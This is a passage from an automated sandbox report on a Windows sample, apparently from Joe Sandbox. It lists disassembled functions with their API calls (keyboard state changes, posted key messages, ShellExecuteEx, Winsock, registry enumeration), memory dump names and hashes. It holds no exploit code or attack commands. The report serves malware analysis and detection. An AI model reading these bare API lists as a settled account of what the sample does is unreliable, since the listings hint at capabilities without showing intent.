                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003CD716
                                              • ShowWindow.USER32(00000003,00000000), ref: 003CD735
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 003CD75A
                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 003CD77D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                              • String ID:
                                              • API String ID: 1211466189-0
                                              • Opcode ID: 73fda0e1e69f5ad070fa247140701fb4124f4bfab8045a302fb9af118724e6cb
                                              • Instruction ID: 0a80f03da053b2bdd44a64c2e1cccfc2d99468236810353a22535ec9df483b0e
                                              • Opcode Fuzzy Hash: 73fda0e1e69f5ad070fa247140701fb4124f4bfab8045a302fb9af118724e6cb
                                              • Instruction Fuzzy Hash: 9BB17971600225AFDF16CF68C985BAA7BB1BF44701F098079FD48EA695DB34AD50CB90
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0037C1C7,00000004,00000000,00000000,00000000), ref: 00342ACF
                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0037C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00342B17
                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0037C1C7,00000004,00000000,00000000,00000000), ref: 0037C21A
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0037C1C7,00000004,00000000,00000000,00000000), ref: 0037C286
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 56e7d850df2997e18a974218ff0275915716892efd6cb6abf17bba80891322ef
                                              • Instruction ID: dd32e05bcba1d104ed7ac11883357ef170d1a075de52fc9b482a50db2e7a6e65
                                              • Opcode Fuzzy Hash: 56e7d850df2997e18a974218ff0275915716892efd6cb6abf17bba80891322ef
                                              • Instruction Fuzzy Hash: 7E410B316146809ECB379B288C8CB6B7BDAEB45300F95C81DF44BAE961CA75B845D711
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 003A70DD
                                                • Part of subcall function 00360DB6: std::exception::exception.LIBCMT ref: 00360DEC
                                                • Part of subcall function 00360DB6: __CxxThrowException@8.LIBCMT ref: 00360E01
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003A7114
                                              • EnterCriticalSection.KERNEL32(?), ref: 003A7130
                                              • _memmove.LIBCMT ref: 003A717E
                                              • _memmove.LIBCMT ref: 003A719B
                                              • LeaveCriticalSection.KERNEL32(?), ref: 003A71AA
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003A71BF
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 003A71DE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 256516436-0
                                              • Opcode ID: 1ba8bd0950c665fb5d40fcd6208a46027a8c7637445f2ccff80d7303e9e5cb44
                                              • Instruction ID: f7387647d9c8bcc3a7d233fe54b793fbe1847e9e26815bff9828ff97b5547903
                                              • Opcode Fuzzy Hash: 1ba8bd0950c665fb5d40fcd6208a46027a8c7637445f2ccff80d7303e9e5cb44
                                              • Instruction Fuzzy Hash: 21316D75900205EFCB06DFA4DC86EAFB7B9EF45310F1481B5E904EB246DB30AA10CBA0
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 003C61EB
                                              • GetDC.USER32(00000000), ref: 003C61F3
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003C61FE
                                              • ReleaseDC.USER32(00000000,00000000), ref: 003C620A
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003C6246
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003C6257
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003C902A,?,?,000000FF,00000000,?,000000FF,?), ref: 003C6291
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003C62B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              • Opcode ID: 999a8ac61cb536eaf1df8ac85787bf78de2236f9fcb8eca03461dc1bde07fe23
                                              • Instruction ID: de0db65f86ffed5b0b18f40f21292657b1129b8ea61dd25e3c83d9b8601b28f8
                                              • Opcode Fuzzy Hash: 999a8ac61cb536eaf1df8ac85787bf78de2236f9fcb8eca03461dc1bde07fe23
                                              • Instruction Fuzzy Hash: 5E314F72101214BFEB128F50CC8AFEA3BAEEF49765F054065FE48DA291C675AC51CB64
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: a8ef88c1a00a2ee9d5cc1b230fa33d3e5420aa9b97449359d7d2086e5ade354c
                                              • Instruction ID: 371fbe598280f1ea57a5767b2f1f2d5c1327497e7c315e8d9214f80d51d1c451
                                              • Opcode Fuzzy Hash: a8ef88c1a00a2ee9d5cc1b230fa33d3e5420aa9b97449359d7d2086e5ade354c
                                              • Instruction Fuzzy Hash: 0021A7A26012057BEA076612BE42FFBF36D9E603C8F098021FD049B68BEF54DE1185B1
                                              APIs
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                • Part of subcall function 0035FC86: _wcscpy.LIBCMT ref: 0035FCA9
                                              • _wcstok.LIBCMT ref: 003AEC94
                                              • _wcscpy.LIBCMT ref: 003AED23
                                              • _memset.LIBCMT ref: 003AED56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                              • String ID: X
                                              • API String ID: 774024439-3081909835
                                              • Opcode ID: d39a440ff5fed004650e8a8148028cf4430da9c14af8e6644b9eeb87d69fb6ba
                                              • Instruction ID: c81d6ee07a9233681d789ce918d6c9ee11bedddf5c590abacb322ab55fd61942
                                              • Opcode Fuzzy Hash: d39a440ff5fed004650e8a8148028cf4430da9c14af8e6644b9eeb87d69fb6ba
                                              • Instruction Fuzzy Hash: 7FC15B716087009FC766EF24C885A6AB7E4EF85310F01492DF8999F2A2DB71EC45CB82
                                              APIs
                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003B6C00
                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003B6C21
                                              • WSAGetLastError.WSOCK32(00000000), ref: 003B6C34
                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 003B6CEA
                                              • inet_ntoa.WSOCK32(?), ref: 003B6CA7
                                                • Part of subcall function 0039A7E9: _strlen.LIBCMT ref: 0039A7F3
                                                • Part of subcall function 0039A7E9: _memmove.LIBCMT ref: 0039A815
                                              • _strlen.LIBCMT ref: 003B6D44
                                              • _memmove.LIBCMT ref: 003B6DAD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3619996494-0
                                              • Opcode ID: 34b88c90dadfb9f790d6674f9c7f6f436ce539a6dd278c33c3c0dc50de43fc5e
                                              • Instruction ID: 48926cfb1bae8bc0d1c15cc650fbc91a6955937b89ec5af6abf78233caf91d04
                                              • Opcode Fuzzy Hash: 34b88c90dadfb9f790d6674f9c7f6f436ce539a6dd278c33c3c0dc50de43fc5e
                                              • Instruction Fuzzy Hash: A7819D71604200ABC712EB24CC86FABB7E9AF84718F144A1DFA559F293DB74AD05CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c7c62057d4f1fb004d4c4afa8cd903f41f9375637c2f9f1c9d37f83d4e3b665
                                              • Instruction ID: 06d4ae3ce82088368f10aefacf55c1b70daef003674bf6f8229b592c3b486884
                                              • Opcode Fuzzy Hash: 5c7c62057d4f1fb004d4c4afa8cd903f41f9375637c2f9f1c9d37f83d4e3b665
                                              • Instruction Fuzzy Hash: F7717A30900509EFCB16CF99CC89EBEBBB9FF85314F158159F915AA251C734AA91CBA0
                                              APIs
                                              • IsWindow.USER32(01605808), ref: 003CB3EB
                                              • IsWindowEnabled.USER32(01605808), ref: 003CB3F7
                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003CB4DB
                                              • SendMessageW.USER32(01605808,000000B0,?,?), ref: 003CB512
                                              • IsDlgButtonChecked.USER32(?,?), ref: 003CB54F
                                              • GetWindowLongW.USER32(01605808,000000EC), ref: 003CB571
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003CB589
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID:
                                              • API String ID: 4072528602-0
                                              • Opcode ID: 328b04e1f18b541abf65acf2ff8d4fb301943fe7c9c8b78566aaf2fe0614a597
                                              • Instruction ID: 255aea1f59b2bc5fc4c4abd1273194c1f5c8485ce050c62797a5ab2c0e11fccf
                                              • Opcode Fuzzy Hash: 328b04e1f18b541abf65acf2ff8d4fb301943fe7c9c8b78566aaf2fe0614a597
                                              • Instruction Fuzzy Hash: 1171A034608644EFDB269F65C896FBAFBB9EF09300F15406DE945D72A2CB31AC50DB50
                                              APIs
                                              • _memset.LIBCMT ref: 003BF448
                                              • _memset.LIBCMT ref: 003BF511
                                              • ShellExecuteExW.SHELL32(?), ref: 003BF556
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                • Part of subcall function 0035FC86: _wcscpy.LIBCMT ref: 0035FCA9
                                              • GetProcessId.KERNEL32(00000000), ref: 003BF5CD
                                              • CloseHandle.KERNEL32(00000000), ref: 003BF5FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                              • String ID: @
                                              • API String ID: 3522835683-2766056989
                                              • Opcode ID: aa994f7568c81e3dbbf36fb3f9d94091b2b5faaa606d20a4c1f14df0d959929b
                                              • Instruction ID: eabca6fe3aa22660c87c79f4a4fb657c08863e4e819a9d31426f7a288a77ea7b
                                              • Opcode Fuzzy Hash: aa994f7568c81e3dbbf36fb3f9d94091b2b5faaa606d20a4c1f14df0d959929b
                                              • Instruction Fuzzy Hash: EB61BD75A006189FCB16DF68C881AAEBBF5FF49314F11806AE819AF751CB30AD41CB80
                                              APIs
                                              • GetParent.USER32(?), ref: 003A0F8C
                                              • GetKeyboardState.USER32(?), ref: 003A0FA1
                                              • SetKeyboardState.USER32(?), ref: 003A1002
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 003A1030
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 003A104F
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 003A1095
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003A10B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: cf854c31ca6a169bf82c9ee500e14fefd5c0b2bc09a85bf95e5cc8ecc456da37
                                              • Instruction ID: 64550a555d20f47cce4f2cc7bb4dbc6e32855bd6c5ffe0b1bd6801de037ffa8f
                                              • Opcode Fuzzy Hash: cf854c31ca6a169bf82c9ee500e14fefd5c0b2bc09a85bf95e5cc8ecc456da37
                                              • Instruction Fuzzy Hash: 6A51E3A05047D53DFB3782348C19BBABFA99B07304F098589E1D59A8D3C2D9ECD8D751
                                              APIs
                                              • GetParent.USER32(00000000), ref: 003A0DA5
                                              • GetKeyboardState.USER32(?), ref: 003A0DBA
                                              • SetKeyboardState.USER32(?), ref: 003A0E1B
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003A0E47
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003A0E64
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003A0EA8
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003A0EC9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 5f7c454ccb05221c6f57e7b836471d9b8ff98b61f65c13fe014e7ed6c0874ac8
                                              • Instruction ID: 18ab18860e1ea6baef845cf6cb642b09e5e3c0df9aa2051149fb0e602cd71837
                                              • Opcode Fuzzy Hash: 5f7c454ccb05221c6f57e7b836471d9b8ff98b61f65c13fe014e7ed6c0874ac8
                                              • Instruction Fuzzy Hash: EB51E4A1544BD53DFB3B87748C55F7ABEA9DB07300F088889E1D49A8C2D395EC98E750
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _wcsncpy$LocalTime
                                              • String ID:
                                              • API String ID: 2945705084-0
                                              • Opcode ID: 92c5e092d48397e7f98f5afac69c0d36716b531c98fe12720ccc2dd58b98494d
                                              • Instruction ID: 38bec1c6b5d8ab4f0620b28d571002c2d164baed600709c427645d3353319f57
                                              • Opcode Fuzzy Hash: 92c5e092d48397e7f98f5afac69c0d36716b531c98fe12720ccc2dd58b98494d
                                              • Instruction Fuzzy Hash: 1941A265C1061876CB13EBF48C869CFB3B8DF06310F50C966E609E7265EB35A245C7AA
                                              APIs
                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039D5D4
                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0039D60A
                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0039D61B
                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0039D69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                              • String ID: ,,=$DllGetClassObject
                                              • API String ID: 753597075-4126740902
                                              • Opcode ID: 6658a01decbb5eade28b4d0ce0fc86a2ef74728db69a83d48c2064a1b33ba15f
                                              • Instruction ID: 9a6761c2772a3f77d1fa871767dc8a4d407a988db77effac4057804441390d0a
                                              • Opcode Fuzzy Hash: 6658a01decbb5eade28b4d0ce0fc86a2ef74728db69a83d48c2064a1b33ba15f
                                              • Instruction Fuzzy Hash: 394160B2600204EFDF16DF64C885A9ABBB9EF54310F5681A9ED09DF205D7B1DD44CBA0
                                              APIs
                                                • Part of subcall function 003A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003A3697,?), ref: 003A468B
                                                • Part of subcall function 003A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003A3697,?), ref: 003A46A4
                                              • lstrcmpiW.KERNEL32(?,?), ref: 003A36B7
                                              • _wcscmp.LIBCMT ref: 003A36D3
                                              • MoveFileW.KERNEL32(?,?), ref: 003A36EB
                                              • _wcscat.LIBCMT ref: 003A3733
                                              • SHFileOperationW.SHELL32(?), ref: 003A379F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 1377345388-1173974218
                                              • Opcode ID: 5035849113202a4da89976479bb34354592ea9c287a744217ebedb040c333631
                                              • Instruction ID: b8797dd1c8585e70bd020582186319eeca5304427de2fcf101f0769369441f87
                                              • Opcode Fuzzy Hash: 5035849113202a4da89976479bb34354592ea9c287a744217ebedb040c333631
                                              • Instruction Fuzzy Hash: A4415D71508344AEC757EF64C4819DFB7ECEF8A380F44092EB49AC7261EA35D689C752
                                              APIs
                                              • _memset.LIBCMT ref: 003C72AA
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C7351
                                              • IsMenu.USER32(?), ref: 003C7369
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003C73B1
                                              • DrawMenuBar.USER32 ref: 003C73C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                              • String ID: 0
                                              • API String ID: 3866635326-4108050209
                                              • Opcode ID: c724f626829a3f4cad20ad4132c9fb20299250292259e07e24bc0595a65c03f3
                                              • Instruction ID: f02686e6f52cddc0714018bf2c67bc20c09d5d97696330e9ade4d216e1c3161b
                                              • Opcode Fuzzy Hash: c724f626829a3f4cad20ad4132c9fb20299250292259e07e24bc0595a65c03f3
                                              • Instruction Fuzzy Hash: E0412579A04248AFDB21DF50D884E9ABBF9FB09350F258529FD15EB290D730AD50DF90
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003C0FD4
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C0FFE
